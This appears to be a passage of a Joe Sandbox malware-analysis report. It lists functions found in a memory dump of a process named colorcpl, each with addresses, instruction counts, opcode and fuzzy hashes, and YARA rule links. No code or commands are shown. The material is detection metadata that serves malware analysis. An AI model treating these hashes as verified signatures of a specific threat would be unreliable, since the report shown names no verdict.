                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                          • Instruction ID: bfc8c716d755be8c291708477fcf3f7e1beb6c2e934097f8017274a2d307f1eb
                                                                                                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                          • Instruction Fuzzy Hash: E4517875A05719CFCB00CF99C580AAEF7B2FF85714F2481A9D915AB351D734AE82CB90
                                                                                                                                          Function 22726154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 735691a27d25314d38abf9699085a576668601f44f760a6b838158f79aa79bbe
                                                                                                                                          • Instruction ID: 1914fcbd5c5a6f2bdedad4df4ec2750ff4c1fd49e19dab8b6dde6c3da4106a76
                                                                                                                                          • Opcode Fuzzy Hash: 735691a27d25314d38abf9699085a576668601f44f760a6b838158f79aa79bbe
                                                                                                                                          • Instruction Fuzzy Hash: 51512570908716CBDB168B24CD44BE9B7F1EF21318F1083AAD529A72D1E774AD81CF81
                                                                                                                                          Function 22720BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3de05a38a916a9d33233260171faedf3f081928f7ee6bb38627d5b9474bb1f79
                                                                                                                                          • Instruction ID: a6b0a99ff3d3643a642405733de961eb32b6ae795cc7e010de63b651532334f3
                                                                                                                                          • Opcode Fuzzy Hash: 3de05a38a916a9d33233260171faedf3f081928f7ee6bb38627d5b9474bb1f79
                                                                                                                                          • Instruction Fuzzy Hash: 8741DF71A097289BCB22CF29C944BDA77B8EF59740F0101A5E908AB241DB34DE84CFA1
                                                                                                                                          Function 227E866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                          • Instruction ID: c1872e3584ca32955b26869088360fa7821c09d5bd4dee1295f4d8215be19970
                                                                                                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                          • Instruction Fuzzy Hash: FB41D775B14305ABDB05CF95CD85AAFBBBAAF88344F5040A9E919E7362DA70DE00C770
                                                                                                                                          Function 22720887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b204051493ed3b22cb59f65d1c9ff73db916541eb8cb82a4e148f57ad5f4fb8c
                                                                                                                                          • Instruction ID: 1c5ec1557cb0bb58530769faaabe8942e7a61dfc1ebef25caed8f1e2b5d05cb2
                                                                                                                                          • Opcode Fuzzy Hash: b204051493ed3b22cb59f65d1c9ff73db916541eb8cb82a4e148f57ad5f4fb8c
                                                                                                                                          • Instruction Fuzzy Hash: E141D1B1608B019FD326CF24C580A22B7F9FF69318B508B6DE58797A55E730F945CBA0
                                                                                                                                          Function 2274A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b51b6fedcae96530b995d6d22bf7cc0a8db879a536faa3d2c06b97502c177380
                                                                                                                                          • Instruction ID: 60ea7cc505070b88622e1518803d42ccfd4cb74537ae6621998f18d030d4e349
                                                                                                                                          • Opcode Fuzzy Hash: b51b6fedcae96530b995d6d22bf7cc0a8db879a536faa3d2c06b97502c177380
                                                                                                                                          • Instruction Fuzzy Hash: 92418B32E49314CFCB05CF68CAA0BADB7B0BB58354F5406A5E811BB2D5DB38D940DBA0
                                                                                                                                          Function 22728BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5f22279f897ed0ea81c3f560e42abfe16f022fe1dbbd2fa35b1d818db456be64
                                                                                                                                          • Instruction ID: a8f21c83692dbf70cb8a1a7ffc99eb9f9df742b158cfa0eb0f8bd14c80e15fe8
                                                                                                                                          • Opcode Fuzzy Hash: 5f22279f897ed0ea81c3f560e42abfe16f022fe1dbbd2fa35b1d818db456be64
                                                                                                                                          • Instruction Fuzzy Hash: 2541497190A701CBC715CF59C980B5A77B2FFA8714F90862AD9016BB95C77ADC81CFA0
                                                                                                                                          Function 22718918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1b1ea990bc6fef7f407a182296f24309c2cef36e4ee629f54da29385949dc65a
                                                                                                                                          • Instruction ID: fce1d25fd27d95c08a37bb48198ccd78f00312820ee8474fb63f823d549174b8
                                                                                                                                          • Opcode Fuzzy Hash: 1b1ea990bc6fef7f407a182296f24309c2cef36e4ee629f54da29385949dc65a
                                                                                                                                          • Instruction Fuzzy Hash: 38412B7150D7469EE312CF648944A5BB6E9AF88B54F80092AF994D7250E730CE45CBD3
                                                                                                                                          Function 2271A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                          • Instruction ID: 63cad4bfbbd5bd46922a3337a87ea354dc1a42c59e2f9f21c6104ae0fe5b7834
                                                                                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                          • Instruction Fuzzy Hash: ED416C31A0C311DBCF01DE748584BBE7771EF96B18F5190AAE9449B244E739CE80CBA0
                                                                                                                                          Function 22750710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                          • Instruction ID: 0345deda11cccd3b9d70fbe18d5c7af60508e2e319b229cfea7cc96291d1188d
                                                                                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                          • Instruction Fuzzy Hash: 05410771A04705EFDB25CF98C980F9AB7F4FF18704B10496DE956E7651D330AA54CB50
                                                                                                                                          Function 2272262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1d712d0fb5d4f46f6e8d0635a8f9c4c5d736fc73041b3641055d43ca1f43b9b9
                                                                                                                                          • Instruction ID: f35dc953563e2b7c5c7240594c6606425cb84d0769ce4433fc39f83a3717cf2a
                                                                                                                                          • Opcode Fuzzy Hash: 1d712d0fb5d4f46f6e8d0635a8f9c4c5d736fc73041b3641055d43ca1f43b9b9
                                                                                                                                          • Instruction Fuzzy Hash: 5C418C71909B05CFC712DF24CA44B49B7B1FF64310F1087AAD9169B6A1EBB0EA41CF51
                                                                                                                                          Function 2275C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a547245bb620bcc3453c1894325ce4d001b1e5717ba06bd4d6e13cbb5414d1ca
                                                                                                                                          • Instruction ID: f7def6006526bab2b9cd642abf100299038aea6e487fae080bec152ff10cc441
                                                                                                                                          • Opcode Fuzzy Hash: a547245bb620bcc3453c1894325ce4d001b1e5717ba06bd4d6e13cbb5414d1ca
                                                                                                                                          • Instruction Fuzzy Hash: 893159B1A09345DFDB02CF68D540B89BBF0FF09724F2185AED519EB251D3369902CB94
                                                                                                                                          Function 227A07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3aa8cdb76e9a59e546b1167bc2f11ccddcf5e5c117393888383a2e512d1c5ada
                                                                                                                                          • Instruction ID: 53bf1bbdec7ab56d7c4d480fdee0f939e7678ecaeeaf8690224ed9200666f9f1
                                                                                                                                          • Opcode Fuzzy Hash: 3aa8cdb76e9a59e546b1167bc2f11ccddcf5e5c117393888383a2e512d1c5ada
                                                                                                                                          • Instruction Fuzzy Hash: D3417F729083509FD361CF29C845B9BBBE8FF88764F004A2AF998D7291D774D904CB96
                                                                                                                                          Function 227180A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ba78c4fe18fe96968dceeb5562379058fdeb609cdbdcab3aad765d623d7c4fa2
                                                                                                                                          • Instruction ID: 7173d70fd8914de98682eade08861acc1d6655c4c976bba5a789fe2c15942a7f
                                                                                                                                          • Opcode Fuzzy Hash: ba78c4fe18fe96968dceeb5562379058fdeb609cdbdcab3aad765d623d7c4fa2
                                                                                                                                          • Instruction Fuzzy Hash: D141CF72E0D715AFEB01CF14C980A99B7B1BF54764FA4832DD815A7280DB34ED41DB90
                                                                                                                                          Function 227A05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1f3d7ae796300452e8b522e584ed12224bdd1f2a3d603a3cf5e10fc1ec4ebddd
                                                                                                                                          • Instruction ID: 96c86b50616cb3c2b93eff6da60e5429457338d18eae381528d18f90880c1fea
                                                                                                                                          • Opcode Fuzzy Hash: 1f3d7ae796300452e8b522e584ed12224bdd1f2a3d603a3cf5e10fc1ec4ebddd
                                                                                                                                          • Instruction Fuzzy Hash: 9C41AE726097559FC311CF68C9A0B7AB3E9AFCC714F000A29F995DB680E734E914C7A6
                                                                                                                                          Function 22718B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d383193c41c2726ace569dcccb0438019ddd9c2dd53010c4835a98aa3967ddec
                                                                                                                                          • Instruction ID: 8e4906e632f1104fa3f9072a53748b195db8ddee5dd4a0fa9957a59b456df244
                                                                                                                                          • Opcode Fuzzy Hash: d383193c41c2726ace569dcccb0438019ddd9c2dd53010c4835a98aa3967ddec
                                                                                                                                          • Instruction Fuzzy Hash: 22417F71E0A704DFDB15CF69C980A9DB7F1FF98324F60866AD466A73A0DB34A941CB40
                                                                                                                                          Function 22724859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 09776dda92fff5209a9d7c8dc0e58d8bc5988e4666538a7ece23b213e57c1c85
                                                                                                                                          • Instruction ID: 09da24148fe8cc955647ab2a98e44069fbd0b45757a9dd4731ed91f02d915006
                                                                                                                                          • Opcode Fuzzy Hash: 09776dda92fff5209a9d7c8dc0e58d8bc5988e4666538a7ece23b213e57c1c85
                                                                                                                                          • Instruction Fuzzy Hash: F141F6712087018FC715CF28D9A4B2AB7E9FF90354F104A3DEAD5AB292DB74D941CB91
                                                                                                                                          Function 227302E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                          • Instruction ID: 642e8ddd5367e09a88434a622b42103977dbaf8f42ea555fe5a16d0bcf38335d
                                                                                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                          • Instruction Fuzzy Hash: 13311631A0D744AFDB138B68CC84B9ABBE9AF15750F0442B9E854E7352C7B4D984CBA1
                                                                                                                                          Function 227CE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6961ea0b42d5b11ed726c74880e0d92db1352b1b315bf717881866411e02d5e6
                                                                                                                                          • Instruction ID: d0c63faee0bf6b474ff07df4edfa2cf3149d5072527707468a1fa5d0d9f123df
                                                                                                                                          • Opcode Fuzzy Hash: 6961ea0b42d5b11ed726c74880e0d92db1352b1b315bf717881866411e02d5e6
                                                                                                                                          • Instruction Fuzzy Hash: 9131C631744755ABD7239F658C85FAB7AB8AF5CB54F000028FA00AB2C1DAB8CD00C7E0
                                                                                                                                          Function 227D4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 50f18a76419116ddd7385258f2218937d2146fcf46619efd5d56212d4ff17a85
                                                                                                                                          • Instruction ID: 1d44a5eb5fe9c878c7100b0fea34316d9fe65aba5c25a810f025520d16b15bc1
                                                                                                                                          • Opcode Fuzzy Hash: 50f18a76419116ddd7385258f2218937d2146fcf46619efd5d56212d4ff17a85
                                                                                                                                          • Instruction Fuzzy Hash: E131BE3320A3108FC329CF19C9A0E16B3E5FB85364F06487EE9999B292D731E800CB91
                                                                                                                                          Function 22724260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 133efeea84e88d9523c81117cc4984da2183d0a8b296b8bc13d07b338f96acf1
                                                                                                                                          • Instruction ID: e7cae6aa6a558160a5fec7ebe66e4557c2e5ec36610d81e3d94fa025edca2fcb
                                                                                                                                          • Opcode Fuzzy Hash: 133efeea84e88d9523c81117cc4984da2183d0a8b296b8bc13d07b338f96acf1
                                                                                                                                          • Instruction Fuzzy Hash: 3341B131208B45DFC712CF24C690FE777E9BF49354F014A69EA999B251C774E800DB95
                                                                                                                                          Function 227D4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9ab8a801bcb363c5dace2061f6c594a455e5851380d3c076344ccd17b3db718f
                                                                                                                                          • Instruction ID: 68bc60ec67027a4f32e0f2b1d8a6a44ac38317f190178bf9e3b110ae5e9d4a48
                                                                                                                                          • Opcode Fuzzy Hash: 9ab8a801bcb363c5dace2061f6c594a455e5851380d3c076344ccd17b3db718f
                                                                                                                                          • Instruction Fuzzy Hash: 44318B7260A3019FC718DF29C9A0E2AB3E5FB84714F05497DE9999B291E730ED04CBA1
                                                                                                                                          Function 2279EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 58b7c723356b60927a035d2d4206aaaececfb588d45c3c3785b4ae1639cbba4f
                                                                                                                                          • Instruction ID: 52d7860752ce5b9b88262b12c1d44c28174e643cfa0f9ad6b85aacbb7093ff00
                                                                                                                                          • Opcode Fuzzy Hash: 58b7c723356b60927a035d2d4206aaaececfb588d45c3c3785b4ae1639cbba4f
                                                                                                                                          • Instruction Fuzzy Hash: C131D33230D785DBE3238759EF48F2577D8AB45788F1904B1AB859B6D2DB28D840C264
                                                                                                                                          Function 227E61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ec0f2a9abae7c6397e03771969e6f746a8ee7489b64aeab5b6205f0b85ae3264
                                                                                                                                          • Instruction ID: 75a6593d86b9474a3390be291e177fb64fc98414b8a40a30034624177a1b3679
                                                                                                                                          • Opcode Fuzzy Hash: ec0f2a9abae7c6397e03771969e6f746a8ee7489b64aeab5b6205f0b85ae3264
                                                                                                                                          • Instruction Fuzzy Hash: AB31D075A04319ABDB15CF98C940BAEB7B9EB48B44F414168E905EB286D770ED00CBA0
                                                                                                                                          Function 2274EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7d3898429215c261ce9fabe52d742c2c7f35d5ac1936ad867467f46d84cfb982
                                                                                                                                          • Instruction ID: 890c91612462d6f4ac2a49da18d402d636591d12fa0651620aea1c5835588aa8
                                                                                                                                          • Opcode Fuzzy Hash: 7d3898429215c261ce9fabe52d742c2c7f35d5ac1936ad867467f46d84cfb982
                                                                                                                                          • Instruction Fuzzy Hash: 1B31AD32E09718AFCB22CEA98D40E9FBBF8EB08760F014565E915E7250DA749E00DB91
                                                                                                                                          Function 227C483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 30a9b60e88f77eac1afa8d6c6e01f6de1a8890303bef31b18eae871d21e2ae22
                                                                                                                                          • Instruction ID: cab35de99ac2cac71dd2dd42353ef5ba21932c9d8f3af7c983010946a2ae29a2
                                                                                                                                          • Opcode Fuzzy Hash: 30a9b60e88f77eac1afa8d6c6e01f6de1a8890303bef31b18eae871d21e2ae22
                                                                                                                                          • Instruction Fuzzy Hash: F2316576A4522CABCB22DF64DD98BDE77F5BB98310F1101E5E508A7250CB30DE918F90
                                                                                                                                          Function 227E60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7181adf7bbcf6f1306542a25349257d017f1dcdf22281c61b34fac3a52a992c2
                                                                                                                                          • Instruction ID: f543d06770176698bc0376bcc3ccfa59e6e89657b016bba4cf6c8aebf06f02c9
                                                                                                                                          • Opcode Fuzzy Hash: 7181adf7bbcf6f1306542a25349257d017f1dcdf22281c61b34fac3a52a992c2
                                                                                                                                          • Instruction Fuzzy Hash: 1131BF72A08715EBD7138FA9C850F5ABBA9AF54754F04406DE50AEB383DA70DD018BA0
                                                                                                                                          Function 227207AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d590f842b829ec71430105f182db8f90d616ccacfd873f565e530b7966011bd7
                                                                                                                                          • Instruction ID: 642606dff6f7081f7374ef3c7170e44eda50cdf989d5fb28abba4641e61ba633
                                                                                                                                          • Opcode Fuzzy Hash: d590f842b829ec71430105f182db8f90d616ccacfd873f565e530b7966011bd7
                                                                                                                                          • Instruction Fuzzy Hash: DB31D176A0DB51DBC712CE248885E5B7BB5AFA4360F024629FD55AB314DA30DC01D7F2
                                                                                                                                          Function 22728550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
